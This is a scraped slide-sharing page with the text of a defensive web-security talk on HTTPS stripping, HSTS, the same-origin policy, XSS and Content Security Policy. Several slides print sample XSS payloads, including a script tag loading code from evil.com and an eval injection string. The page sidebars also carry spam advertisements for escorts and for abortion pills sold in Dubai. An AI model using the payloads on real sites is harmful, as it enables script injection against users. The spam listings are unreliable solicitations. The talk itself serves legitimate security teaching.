MINDCTI Revenue Release Quarter One 2024MINDCTI Revenue Release Quarter One 2024
MINDCTI Revenue Release Quarter One 2024MIND CTI
 
GenAI Risks & Security Meetup 01052024.pdf
GenAI Risks & Security Meetup 01052024.pdfGenAI Risks & Security Meetup 01052024.pdf
GenAI Risks & Security Meetup 01052024.pdflior mazor
 
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...Jeffrey Haguewood
 
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data DiscoveryTrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data DiscoveryTrustArc
 
DBX First Quarter 2024 Investor Presentation
DBX First Quarter 2024 Investor PresentationDBX First Quarter 2024 Investor Presentation
DBX First Quarter 2024 Investor PresentationDropbox
 
Navi Mumbai Call Girls 🥰 8617370543 Service Offer VIP Hot Model
Navi Mumbai Call Girls 🥰 8617370543 Service Offer VIP Hot ModelNavi Mumbai Call Girls 🥰 8617370543 Service Offer VIP Hot Model
Navi Mumbai Call Girls 🥰 8617370543 Service Offer VIP Hot ModelDeepika Singh
 
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, AdobeApidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobeapidays
 
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost SavingRepurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost SavingEdi Saputra
 
Architecting Cloud Native Applications
Architecting Cloud Native ApplicationsArchitecting Cloud Native Applications
Architecting Cloud Native ApplicationsWSO2
 
EMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWER
EMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWEREMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWER
EMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWERMadyBayot
 
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc
 
presentation ICT roal in 21st century education
presentation ICT roal in 21st century educationpresentation ICT roal in 21st century education
presentation ICT roal in 21st century educationjfdjdjcjdnsjd
 
FWD Group - Insurer Innovation Award 2024
FWD Group - Insurer Innovation Award 2024FWD Group - Insurer Innovation Award 2024
FWD Group - Insurer Innovation Award 2024The Digital Insurer
 
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone ProcessorsExploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processorsdebabhi2
 
Polkadot JAM Slides - Token2049 - By Dr. Gavin Wood
Polkadot JAM Slides - Token2049 - By Dr. Gavin WoodPolkadot JAM Slides - Token2049 - By Dr. Gavin Wood
Polkadot JAM Slides - Token2049 - By Dr. Gavin WoodJuan lago vázquez
 
AXA XL - Insurer Innovation Award Americas 2024
AXA XL - Insurer Innovation Award Americas 2024AXA XL - Insurer Innovation Award Americas 2024
AXA XL - Insurer Innovation Award Americas 2024The Digital Insurer
 
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot TakeoffStrategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoffsammart93
 

Recently uploaded (20)

Manulife - Insurer Transformation Award 2024
Manulife - Insurer Transformation Award 2024Manulife - Insurer Transformation Award 2024
Manulife - Insurer Transformation Award 2024
 
Strategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a FresherStrategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a Fresher
 
MINDCTI Revenue Release Quarter One 2024
MINDCTI Revenue Release Quarter One 2024MINDCTI Revenue Release Quarter One 2024
MINDCTI Revenue Release Quarter One 2024
 
GenAI Risks & Security Meetup 01052024.pdf
GenAI Risks & Security Meetup 01052024.pdfGenAI Risks & Security Meetup 01052024.pdf
GenAI Risks & Security Meetup 01052024.pdf
 
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
 
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data DiscoveryTrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
 
DBX First Quarter 2024 Investor Presentation
DBX First Quarter 2024 Investor PresentationDBX First Quarter 2024 Investor Presentation
DBX First Quarter 2024 Investor Presentation
 
Navi Mumbai Call Girls 🥰 8617370543 Service Offer VIP Hot Model
Navi Mumbai Call Girls 🥰 8617370543 Service Offer VIP Hot ModelNavi Mumbai Call Girls 🥰 8617370543 Service Offer VIP Hot Model
Navi Mumbai Call Girls 🥰 8617370543 Service Offer VIP Hot Model
 
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, AdobeApidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
 
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost SavingRepurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
 
Architecting Cloud Native Applications
Architecting Cloud Native ApplicationsArchitecting Cloud Native Applications
Architecting Cloud Native Applications
 
EMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWER
EMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWEREMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWER
EMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWER
 
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
 
presentation ICT roal in 21st century education
presentation ICT roal in 21st century educationpresentation ICT roal in 21st century education
presentation ICT roal in 21st century education
 
FWD Group - Insurer Innovation Award 2024
FWD Group - Insurer Innovation Award 2024FWD Group - Insurer Innovation Award 2024
FWD Group - Insurer Innovation Award 2024
 
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
 
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone ProcessorsExploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processors
 
Polkadot JAM Slides - Token2049 - By Dr. Gavin Wood
Polkadot JAM Slides - Token2049 - By Dr. Gavin WoodPolkadot JAM Slides - Token2049 - By Dr. Gavin Wood
Polkadot JAM Slides - Token2049 - By Dr. Gavin Wood
 
AXA XL - Insurer Innovation Award Americas 2024
AXA XL - Insurer Innovation Award Americas 2024AXA XL - Insurer Innovation Award Americas 2024
AXA XL - Insurer Innovation Award Americas 2024
 
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot TakeoffStrategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
 

Why Traditional Web Security Technologies no Longer Suffice to Keep You Safe

  • 1. Why Traditional Web Security Technologies no Longer Suffice to Keep You Safe Philippe De Ryck @PhilippeDeRyck https://www.websec.be
  • 2. Which Scenario Would You Trust? (a) Visit website, browse public pages Login with username and password Consult private information Visit website, browse public pages Login with username and password Consult private information Visit website, browse public pages Login with username and password Consult private information (b) (c)
  • 3. About Me – Philippe De Ryck 3 § Postdoctoral Researcher @ DistriNet (KU Leuven) § PhD on client-side Web security § Expert in the broad field of Web security § Main author of the Primer on Client-Side Web Security § Running the Web Security training program § Dissemination of knowledge and research results § Public training courses and targeted in-house training § Target audiences include industry and researchers § Part of the organizing committee of SecAppDev.org § Week-long course focused on practical security https://www.websec.be@PhilippeDeRyck
  • 4.
  • 5. The Web Used to Be Server-Centric 5
  • 6. With a lot of Server-Side Problems 6 http://arstechnica.com/security/2015/12/hackers-actively-exploit-critical-vulnerability-in-sites-running-joomla/
  • 7. With a lot of Server-Side Problems 7 http://motherboard.vice.com/read/one-of-the-largest-hacks-yet-exposes-data-on-hundreds-of-thousands-of-kids
  • 8. 8
  • 9. 9
  • 10. 10
  • 11. The Web has Become Client-Centric 11
  • 12. The Network Can no Longer Be Trusted 12
  • 13. Networks Are Everywhere 13 § We happily connect to any wifi network we can find § Without knowing who has control over the network § Upstream networks are easily intercepted nowadays § Intercepting proxies at the network perimeter § ISPs inspecting and manipulating traffic § State agencies tapping the backbone
  • 14. The Communication Channel Is Insecure 14 § People are mainly concerned about eavesdropping attacks § Sniffing usernames, passwords, session identifiers, … § Demonstrated in 2010 by the Firesheep add-on http://codebutler.com/firesheep/
  • 15. The Communication Channel Is Insecure 15 § People are mainly concerned about eavesdropping attacks § Sniffing usernames, passwords, session identifiers, … § Demonstrated in 2010 by the Firesheep add-on § Generally prevented by using HTTPS for sensitive data § But today, active network attacks are just as easy to execute § Man on the side attacks inject traffic into the network § Man in the middle attacks intercept and manipulate traffic § Simply using HTTPS for sensitive data no longer suffices
  • 16. Care to Reconsider your Previous Answer? (a) Visit website, browse public pages Login with username and password Consult private information Visit website, browse public pages Login with username and password Consult private information Visit website, browse public pages Login with username and password Consult private information (b) (c)
  • 17. Averting the Use of HTTPS 17
  • 18. Stripping HTTPS from Login Forms 18 some-shop.com Visit http://some-shop.com Welcome, please log in Login as Philippe Welcome Philippe Visit http://some-shop.com Welcome, please log in Login as Philippe Welcome Philippe Rewrite HTTPS to HTTP
  • 19. HTTPS Prevents Man in the Middle Attacks 19 some-shop.com Visit https://some-shop.com Welcome, please log in Login as Philippe Welcome Philippe Visit https://some-shop.com Welcome, please log in Login as Philippe Welcome Philippe
  • 20. HTTPS Prevents Man in the Middle Attacks? 20 http://news.netcraft.com/archives/2016/03/17/95-of-https-servers-vulnerable-to-trivial-mitm-attacks.html
  • 21. Bootstrapping the HTTPS Site 21 GET http://some-shop.com 200 OK Response page POST http://some-shop.com GET http://… 301 Moved GET https://… 200 OK Rewrite HTTPS URLs User: philippe & pass: pazzw0rd POST https://… some-shop.com
  • 22. SSL Stripping Is a Sneaky Attack 22
  • 23. HTTP Strict Transport Security (HSTS) 23 § Instruct the browser to only visit a site over HTTPS § Once-enabled no HTTP requests will be sent anymore § Prevents SSL stripping attacks § Prevents cookie stealing over HTTP GET https://websec.be websec.be 200 OK Response page
  • 24. HTTP Strict Transport Security (HSTS) 24 § HSTS is a server-driven browser-enforced security policy § Server sends the Strict-Transport-Security response header § The protection is only applied for the duration of max-age § Make sure this value covers non-frequent visitors § The value 0 disables the HSTS policy for this particular host • Only if received over an error-free channel Strict-Transport-Security: max-age=31536000; includeSubdomains 4 4 7 11From version … 4.4.4 7.1
  • 25. HSTS in Action 25 GET https://websec.be websec.be 200 OK Response page Strict-Transport-Security: max-age=31536000; includeSubdomains GET https://websec.be 200 OK Response page Strict-Transport-Security: max-age=31536000; includeSubdomains www.websec.be GET https://www.websec.be 200 OK Response page Strict-Transport-Security: max-age=31536000; includeSubdomains
  • 26. The Bootstrapping Problem … Again 26 GET https://websec.be websec.be 200 OK Response page Strict-Transport-Security: max-age=31536000; includeSubdomains GET https://websec.be 200 OK Response page Strict-Transport-Security: max-age=31536000; includeSubdomains www.websec.be GET https://www.websec.be 200 OK Response page Strict-Transport-Security: max-age=31536000; includeSubdomains
  • 27. Preloading HSTS 27 § The bootstrapping problem is solved by a preloaded list § Contains all sites that have explicitly subscribed to HSTS § Distributed along with the browsers § Available on https://hstspreload.appspot.com/
  • 28. HTTPS Should Be Enabled by Default 28 § Browser vendors are strongly pushing towards HTTPS § Firefox marks HTTP pages with password fields as insecure § Google uses HTTPS as a ranking signal in its search engine § Active mixed content is blocked in modern browsers § Chrome and Firefox will support Secure Contexts § A Secure Context is delivered over HTTPS, including its parents § Powerful features will only be exposed to a Secure Context • E.g. Geolocation, microphone and camera access, …
  • 29. Hardening your HTTPS Deployment 29 § Finetune the supported protocols and ciphers § Disable the old and obsolete SSLv2 and SSLv3 § Avoid the use of old and weak ciphers § Move all your traffic to HTTPS § Immediately redirect all HTTP traffic to HTTPS § Prevent SSL Stripping by enabling Strict Transport Security (HSTS) § If you want to go all out, enable Public Key Pinning (HPKP) § Prevents impersonation attacks with rogue but valid certificates https://www.ssllabs.com/ssltest/
  • 30. Insecure Third-Party Content Can Be Disastrous 30
  • 31. Browsers Do More than Rendering HTML 31 § Modern browsers are full-fledged application platforms § Plenty of system features are exposed to Web applications • Battery status, Vibration, Geolocation, Microphone & Camera, … § ChromeOS and FirefoxOS run all applications inside a browser § The key enabler for all of this functionality is JavaScript § Since its introduction in 1995, JS has finally taken over the Web § Plugins like Flash and Silverlight are slowly fading away § So, how about security? § We have the same-origin policy, but it’s 20 years old …
  • 32. The Same-Origin Policy 32 http://example.com http://example.com http://example.com http://private.example.com http://forum.example.com http://private.example.com SAME-ORIGIN POLICY Content retrieved from one origin can freely interact with other content from that origin, but interactions with content from other origins are restricted ORIGIN The triple <scheme, host, port> derived from the document’s URL. For http://example.org/forum/, the origin is <http, example.org, 80>
  • 33. Origins, Frames and Scripts 33 § The browser enforces origin-based separation § Frames have a context, a document URL and an associated context § Scripts are loaded into the context of the including page § Classical trade-off between isolation and flexibility http://example.com http://malvertisements.com http://example.com Script code from http://malvertisements.com <iframe src=“http://malvertisements.com/pwnme.html” > <script src=“http://malvertisements.com/pwnme.js” >
  • 34. The Same-Origin Policy in Practice 34 § Most content integration is script-based § Included directly into the application’s context § Which makes sense for libraries, such as JQuery § But not for standalone third-party components § Every included script is a security risk § Because it has full access to your context § So you have to trust the supplier § And the security of their systems
  • 36. Responsibly Including Third-Party Content 36 § Isolate the content in a context with a different origin § Let the Same-Origin Policy protect you § Enable interaction by exchanging messages between contexts § Further restrict isolated context using the HTML5 Sandbox § Allows you to disable certain features in a framed context § Allows you to place your own content in a unique origin § Verify the integrity of content loaded from a CDN § Enabled by the brand new Subresource Integrity specification § Prevents malware distribution by compromising a CDN https://blogs.dropbox.com/tech/2015/09/csp-third-party-integrations-and-privilege-separation/
  • 37. With XSS, the Attacker Includes the Code for You 37 Add review Thanks for the review! reviews I can really recommend product X. It is awesome! <script>alert(‘Never gonna let you down!’)</script> Show Reviews Reviews page <html><body>… …</body></html>
  • 40. Traditional XSS Defenses 40 § The server compiles data and code into a single HTML page § XSS causes the browser to mistake data for code § The proper defense is context-sensitive output encoding § Encode for the context where the data will be used § HTML body <h1>DATA</h1> § HTML attributes <div id=‘DATA’> § Stylesheet context body { background-color: DATA;} § Script context alert(“DATA”); § URL context <a href=“http://…?arg=DATA”>
  • 41. Content Security Policy against XSS 41 <h1>You searched for<script>alert(‘XSS’);</script></h1> XSS WITH INLINE SCRIPTS <h1>You searched for<script src=“https://evil.com/hackme.js”></script></h1> XSS WITH REMOTE SCRIPTS eval('alert("Your query string was ' + unescape(document.location.search) //hello%22);alert(1+%22 + '");'); XSS WITH EVAL
  • 42. The Essence of CSP 42 § CSP reduces the harm of content injection vulnerabilities § By telling the client where resources should be loaded from § By disabling “dangerous features” by default § CSP is intended as a second line of defense § CSP will become more important in the future § Supporting CSP in your application may be non-trivial § Use of inline script blocks is disallowed § Use of eval is disallowed
  • 43. Introducing CSP by Example 43 Content-Security-Policy: default-src 'self'; script-src ‘self’ https://cdnjs.cloudflare.com; style-src ‘self’ https://cdnjs.cloudflare.com/…/bootstrap.min.css; EXAMPLE POLICY § A policy consists of a set of directives § Each directive controls a different kind of resource § Policy is delivered as an HTTP header by the server • Alternatively, the meta tag can also be used § Compatible browsers will enforce the policy on the response
  • 44. CSP is the Security Policy of the Future 44 § CSP has been well received, and evolved quickly § Addition of plugin types, sandbox, child contexts, form destinations § Re-enabling inline script with support for nonces and hashes § Deprecates X-FRAME-OPTIONS header § Supports blocking of mixed content / upgrading insecure requests § CSP level 1 is widely supported by browsers § Support for level 2 is less widespread, but improving rapidly § Chrome makes CSP mandatory for its components § Browser extensions and packaged apps
  • 45. CSP Violation Reports 45 § CSP can report violations back to the resource server § Allows for fine-tuning of the CSP policy § Gives insights in actual attacks § Enabled by using the report-uri directive § Points to a handler on the server that can process reports Content-Security-Policy: default-src 'self'; report-uri http://some-shop.com/csp-report.cgi EXAMPLE POLICY
  • 46. The Web has Become Client-Centric 46
  • 47. Progressive Web Security 47 § Take a progressive stance towards Web security § The Web has become client-centric, and so has Web security § Fully protecting your applications requires the latest technologies § All of these security technologies require explicit action § Training is essential to keep up to date with the latest technologies § Share your experiences, help others advance as well § Set an example on how to do it right
  • 48. 48 I hope you learned something tonight … Now it’s up to you Grab a copy of the slides and share with anyone you can find Read my blog or follow me on Twitter to stay informed about web security Level up with Web security training! All information on https://www.websec.be
  • 49. Why Traditional Web Security Technologies no Longer Suffice to Keep You Safe Acknowledgements Icons by Visual Pharm (https://icons8.com) Images by Unsplash (https://unsplash.com/)
  • 50. Why Traditional Web Security Technologies no Longer Suffice to Keep You Safe Philippe De Ryck philippe.deryck@cs.kuleuven.be /in/philippederyck https://www.websec.be @PhilippeDeRyck